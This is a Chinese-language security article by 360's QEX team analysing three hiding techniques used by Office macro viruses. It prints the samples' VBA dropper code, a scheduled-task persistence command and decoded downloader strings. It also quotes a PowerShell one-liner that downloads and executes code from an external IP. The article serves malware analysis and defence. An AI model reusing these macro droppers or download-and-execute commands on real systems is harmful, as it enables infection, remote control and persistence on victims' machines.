技術揭秘:宏病毒程式碼三大隱身術

wyzsk發表於2020-08-19
作者: 360安全衛士 · 2016/06/06 10:39

0x00 簡介


作為一類古老的病毒,宏病毒隨著勒索軟體的興起而捲土重來。尤其是在2016年,以Locky為代表的勒索軟體利用Office宏肆虐傳播,宏病毒也成為目前最活躍的病毒品種之一。

在與安全軟體的對抗中,宏病毒使用了多種手段隱藏其惡意程式碼或資料,近期出現的新變種則是利用Excel表格的函式動態生成PE檔案資料、設定遠距離存放位置、隱藏顯示、不同表切換等方式進行隱藏。接下來,360QEX引擎團隊將對宏病毒程式碼流行的三類“隱身術”進行逐一揭秘。

0x01 Excel表格隱藏資料


  • 樣本檔案md5: 48f202f903741e7a1722bfa6b4c051aa.xls
  • sha256: 083a05000c4b8e9a88a0ff8a95a3d9826dd389b440bb1781237ca124b0d986a7

virustotal 掃描結果:

p1

樣本對自身 VBAProject 進行了加密,

p2

破解之後,看到了宏程式碼執行入口函式 Auto_Open,

#!vb
Sub Auto_Open()

On Error Resume Next
Application.DisplayAlerts = False
Dim WB As Workbook
Set WB = ActiveWorkbook

Dim Sh1, Sh2, sh3 As Worksheet
Set Sh1 = WB.Sheets(1)
Set Sh2 = WB.Sheets(2)
Set sh3 = WB.Sheets(3)
Dim str As String
str = Sh2.Cells(996, 40)
Dim t As Date
t = Now + TimeSerial(0, 0, 1)
Application.OnTime t, str

End Sub

病毒作者使用 Application.OnTime 函式,間隔 1 秒,執行 字串 “str” ,”str” 的值是從表格 Cells(996, 40) 中獲取,當去檢視錶格中該處值時發現病毒更改了Excel單元格格式 ,把資料隱藏顯示。

單元格格式設定為三個 ;;; 時,單元格內容就會被隱藏。

p3

單元格的格式預設是顯示的,初始設定為,

p4

去掉隱藏後,檢視錶格中該值是 Fnslr12 , 即病毒的功能入口函式名稱,函式程式碼為,

#!vb
Sub Fnslr12()

On Error Resume Next
Application.DisplayAlerts = False
Call Build
Sheets(1).Select
Dim WB As Workbook
Set WB = ActiveWorkbook

Dim Sh1, Sh2, sh3 As Worksheet
Set Sh1 = WB.Sheets(1)
Set Sh2 = WB.Sheets(2)

If Cells(2, 1) <> "" Then
GoTo skyhigh
End If
''' 以下省略

因此,該函式為病毒程式碼的主功能函式。

此函式的功能有,

1、Call Build

呼叫 Build 函式, Build 函式功能為:在表格中動態生成,待寫入 可執行檔案(pe檔案)所需的資料,其功能程式碼簡略如下,

#!vb
Sub Build()

Sheets(2).Select
Set WB = ActiveWorkbook
Set Sh1 = WB.Sheets(1)
Set Sh2 = WB.Sheets(2)

'bob location
i = Sh2.Cells(1000, 12)
j = Sh2.Cells(1000, 13)

'index table location
R = Sh2.Cells(1000, 10)
C = Sh2.Cells(1000, 11)

Counter = R
Do While Sh2.Cells(Counter, C) <> ""

If Sh2.Cells(Counter, C + 1) <> "" Then
S1 = Sh2.Cells(Counter, C)
S2 = Sh2.Cells(Counter, C + 1)
End If
Counter = Counter + 1
Loop

Cells(i, j).Select
 Range(Selection, Selection.End(xlDown)).Select
Selection.Cut
Range("i1001").Select
ActiveSheet.Paste
Cells(1, 1).Select
End Sub

函式執行結果為,在 1001 行往下,依次每行填入資料。

p5

2、對是否執行過一次做檢查

#!vb
If Cells(2, 1) <> "" Then
GoTo skyhigh
End If

當執行過一次之後, Cells(2,1) 表格會被寫入值,會在這裡進入語句 Then ,執行 “Goto skyhigh” 語句, “skyhigh” 標記定位在函式尾部,即執行該語句後會退出該函式。

3

從程式碼意圖猜測,病毒作者想在 %userprofile% AppDataRoamingMicrosoftTemplates 生成一個名為Macro1.vbs 的vbs檔案 ,

#!vb
Dim Fnslr1 As String
    Dim Fnslr2 As String
    Fnslr2 = Environ(Sh2.Cells(998, 40)) & "AppDataRoamingMicrosoftTemplatesMacro1.vbs"
    ChDrive (Fnslr2)
If Dir(Fnslr2) = "" Then
Else
End If

其中,病毒拼湊生成檔案的目錄路徑時,從表格 2 的Cells(998, 40) 中讀取 ,該值為環境變數值 userprofile.

p6

只是,病毒作者並沒有繼續完善相關程式碼。實際測試執行樣本也並沒有生成該檔案,猜測可能作者後續加入該功能,或者該功能已經被取消。

4

%serprofile% AppDataRoamingMicrosoftTemplates 目錄生成可執行檔案 Macro1.exe,

#!vb
Dim i As Double
i = 1000
    Fnslr1 = "Macro1.exe"
    Fnslr2 = Environ(Sh2.Cells(998, 40)) & "AppDataRoamingMicrosoftTemplates"
    Fnslr3 = FreeFile()
    Open Fnslr1 For Binary As Fnslr3
    Do While Sh2.Cells(i, 9) <> ""
            Fnslr11 = Sh2.Cells(i, 9)
        If (Fnslr9 = True) Then
            Fnslr8 = 1
            Do While (Fnslr8 < Len(Fnslr11))
                Fnslr6 = Sh2.Cells(997, 40) & Mid(Fnslr11, Fnslr8, 3)
                Put #Fnslr3, , Fnslr6 
                Fnslr8 = Fnslr8 + 3
            Loop
        End If
        If Fnslr9 = False Then
            Fnslr9 = True
        End If
         i = i + 1
    Loop
    Close #Fnslr3
Dim Fnslr10 As String
Fnslr10 = Fnslr1
    Fnslr7 = Shell(Fnslr10, vbHide)
Dim i As Double
i = 1000
    Fnslr1 = "Macro1.exe"
    Fnslr2 = Environ(Sh2.Cells(998, 40)) & "AppDataRoamingMicrosoftTemplates"
    Fnslr3 = FreeFile()
    Open Fnslr1 For Binary As Fnslr3
    Do While Sh2.Cells(i, 9) <> ""
            Fnslr11 = Sh2.Cells(i, 9)
        If (Fnslr9 = True) Then
            Fnslr8 = 1
            Do While (Fnslr8 < Len(Fnslr11))
                Fnslr6 = Sh2.Cells(997, 40) & Mid(Fnslr11, Fnslr8, 3)
                Put #Fnslr3, , Fnslr6 
                Fnslr8 = Fnslr8 + 3
            Loop
        End If
        If Fnslr9 = False Then
            Fnslr9 = True
        End If
         i = i + 1
    Loop
    Close #Fnslr3
Dim Fnslr10 As String
Fnslr10 = Fnslr1
    Fnslr7 = Shell(Fnslr10, vbHide)

寫入 Macro1.exe 所需的資料,從 Excel 表格中 Cells(997, 40) 周圍讀取,實際測試資料開始位置是 1001行,

p7

程式碼尾部使用 Shell 函式,啟動生成的 Macro1.exe 。

檔案資訊

p8

可執行檔案是 x64位的,功能是,啟動 powershell 附帶 –enc 引數,執行一段 shellcode ,這段 shellcode是一個 reverse shell ,連線駭客伺服器,等待下達命令。

此部分與下面建立計劃任務不間斷執行的功能呼應起來,此部分不是本文重點,不再詳述。

5、

在 %serprofile% AppDataRoamingMicrosoftTemplates 目錄生成 bat (cmd) 批處理指令碼檔案 Macro1.bat,

#!vb
Fnslr2 = Environ(Sh2.Cells(998, 40)) & "AppDataRoamingMicrosoftTemplates"

Dim User As String
User = Environ(Sh2.Cells(998, 40))
 Fname = Fnslr2 & "Macro1.bat"
FNum = FreeFile
Open Fname For Output Access Write As #FNum

WholeLine = "SchTasks /Create /SC HOURLY /TN " & Sh2.Cells(1000, 3) & "Macro1" & Sh2.Cells(1000, 3) & " /TR" & " " & User & "AppDataRoamingMicrosoftTemplates" & "Macro1.exe /ST 01:00"
 Print #FNum, WholeLine
Close #FNum

Dim TempFileName As String
TempFileName = Fnslr2 & "Macro1.bat"
Shell TempFileName, vbHide

尾部使用 Shell 函式 啟動該指令碼,結果是在使用者機器建立了一個計劃任務, 每隔一小時執行一次 上面生成的 Macro1.exe 。

p9

6、彈窗顯示輸入密碼才能繼續進行執行

#!vb
pword = InputBox("Please enter a password to proceed", "Password Required", "*******")
  Select Case pword
  Case Is = ""
   MsgBox "Try Again"
    Case "Alon2016"
      RP = 1

     Case Is <> "Alon2016"
         MsgBox "Try Again"
  End Select

p10

從病毒程式碼中知道,要求輸入的密碼是 “Alon2016” 。

7、

接下來是現場清理和掩飾,刪除呼叫Build 函式在表格生成的資料,在表格的開頭顯著位置填入在其他表格中儲存的郵件收件人地址資訊,

p11

小結:該樣本的特別之處有:

  1. PE檔案資料是使用函式動態生成
  2. 資料存放在Excel表格中,使用隱藏顯示
  3. 資料存放位置很遠,不容易被看到
  4. 病毒在不同的excel表中切換,給分析人員除錯VBA程式碼增加困難
  5. 病毒執行完畢,清理現場,顯示郵件地址列表,掩飾自身

0x02 VBA User Form隱藏程式碼


此類病毒把部分程式碼隱藏到 VBA 工程中的 使用者控制元件(User Form)中,甚至把帶有程式碼的控制元件最小化,使之不易被看到。

  • 樣本檔案md5:9266db6c7772f6c45411ff3a591b1374
  • sha256 : 9d11f2d2f0e0e5fd8a2ef552a5521920767d7939881443435296d0c600e4a71a

virustotal 掃描結果:

p12

檢視該檔案的宏,

p13

此檔案看起來像是正常的SQL操作類的宏程式碼,但是當我們檢視窗體 Ultra 時發現,

p14

有個控制元件的Caption中存放了可疑資料如下,

#!bash
D!icrobrioft.XD!LHTTP10)Adodb.britr00aD!10)brih00ll.Application10)Wbricript.brih00ll10)Proc00bribri10)G00T10)T00D!P10)Typ0010)op00n10)writ0010)r00briponbri00Body10)briav00tofil0010)hendib00.00x00

此資料在宏程式碼中被使用的位置為,

#!vb
CadenaCurrency(Ultra.CommandButton3.Caption, "00", "e")

其中,CadenaCurrency 是一個簡單的 Replace 呼叫,

#!vb
Public Function CadenaCurrency(A1 As String, A2 As String, A3 As String) As String
CadenaCurrency = Replace(A1, A2, A3)
End Function

解密方法是,

#!vb
Dim aproblems As String
 aproblems = CadenaCurrency(Ultra.CommandButton3.Caption, "00", "e")
 aproblems = CadenaCurrency(aproblems, "D!", "M")
 aproblems = CadenaCurrency(aproblems, "bri", "s")
 constans_problems = Split(aproblems, "10)")

解密為,

#!bash
Microsoft.XMLHTTP
Adodb.stream
shell.Application
Wscript.shell
Process
GeT
Temp
Type
open
write
responseBody
savetofile
hendibe.exe

幾個字串呈現出非常明顯的意圖,下載(Microsoft.XMLHTTP)+ 寫檔案(Adodb.stream)+ 執行(shell.Application / Wscript.shell)。

此樣本因為程式碼有問題,沒能成功執行起來。找到宏程式碼中使用 Microsoft.XMLHTTP 物件下載檔案的位置,加上斷點除錯,起先因為作者疏忽,忘記書寫一個雙引號,導致編譯失敗,

p15

之後,執行到下載檔案處時,出現了報錯。

p16

0x03 文件內建屬性隱藏程式碼


此類病毒把程式碼核心惡意部分放入文件的內建屬性中。

  • 樣本檔案md5:0ce81eda6b6886163cf5dadffecc0df9
  • sha256: 23d07a51f7a14a95a1efc55ad3f18cd5a71607156cd325256d43f0b68cfb62cd

virustotal 掃描結果:

p17

此樣本的vba 宏程式碼只有1個檔案,很簡短,

#!vb
Attribute VB_Name = "NewMacros"
Sub Auto_Open()
Call winshell
End Sub

Sub AutoOpen()
Call winshell
End Sub

Function winshell() As Object
    On Error Resume Next
    Err.Clear

    Dim ps As String
    ps = ActiveDocument.BuiltInDocumentProperties("Manager").Value
    Dim Obj As Object
    Set Obj = CreateObject("WScript.Shell")
    Obj.Run ps, 0

Application.DisplayAlerts = False
End Function

響應兩個文件開啟事件,AutoOpen 與Auto_Open,直接執行 winshell函式, winshell函式讀取檔案內建屬性,Manager 的值,直接執行起來。Manager值,我們使用右鍵檔案屬性,檢視為,

p18

#!powershell
powershell.exe -nop -w hidden -c $b=new-object net.webclient;$b.proxy=[Net.WebRequest]::GetSystemWebProxy();$b.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $b.downloadstring('http://37.28.154.204:8081/ygklKbyIVG51Kol');

是一段 Powershell 執行的指令碼程式碼,從指定 URL (http://37.28.154.204:8081/ygklKbyIVG51Kol) 下載檔案。目前測試此URL已經無法訪問。

0x04 總結


以加密勒索為代表的病毒,越來越多的使用Office宏,js,vbs等非Pe檔案來傳播。透過指令碼程式碼動態向Windows 目錄中釋放可執行檔案或者從伺服器下載可執行檔案。

非PE病毒查殺引擎QEX是 360安全產品中負責查殺宏病毒及vbs、js、html等指令碼病毒的獨有引擎。上述樣本QEX引擎均已查殺。

在這裡也提醒 Microsoft Office 文件系列軟體的使用使用者,

  1. 如日常無使用宏的需求,請禁用 Office 宏,禁用方式參考

    https://support.office.com/zh-cn/article/%E5%90%AF%E7%94%A8%E6%88%96%E7%A6%81%E7%94%A8-Office-%E6%96%87%E6%A1%A3%E4%B8%AD%E7%9A%84%E5%AE%8F-7b4fdd2e-174f-47e2-9611-9efe4f860b12

  2. 對於經常使用宏工作的使用者,請安裝安全軟體,定期更新病毒庫,對於他人傳送的文件,在開啟之前請先掃描。

0x05 Reference


本文章來源於烏雲知識庫,此映象為了方便大家學習研究,文章版權歸烏雲知識庫!

相關文章